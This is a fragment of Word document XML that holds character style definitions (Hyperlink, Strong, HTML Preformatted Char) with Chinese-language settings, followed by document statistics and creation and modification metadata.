    <w:rsid w:val="2F38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zh-CN" w:eastAsia="zh-CN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zh-CN" w:eastAsia="zh-CN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zh-CN" w:eastAsia="zh-CN"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zh-CN" w:eastAsia="zh-CN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zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="6"/>
    <w:semiHidden/>
    <w:unhideWhenUsed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13">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="6"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14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zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15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zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16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zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17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val="zh-CN" w:eastAsia="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="1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19">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="6"/>
    <w:link w:val="10"/>
    <w:semiHidden/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20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8875</Words>
  <Characters>50593</Characters>
  <Lines>421</Lines>
  <Paragraphs>118</Paragraphs>
  <TotalTime>7</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>59350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2025-05-13T17:44:00Z</dcterms:created>
  <dc:creator>sameer sohail</dc:creator>
  <cp:lastModifiedBy>Raheel Ch</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-18T12:37:29Z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1F3E394FF1CC46E09105E112BB777F8B_13</vt:lpwstr>
  </property>
</Properties>
</file>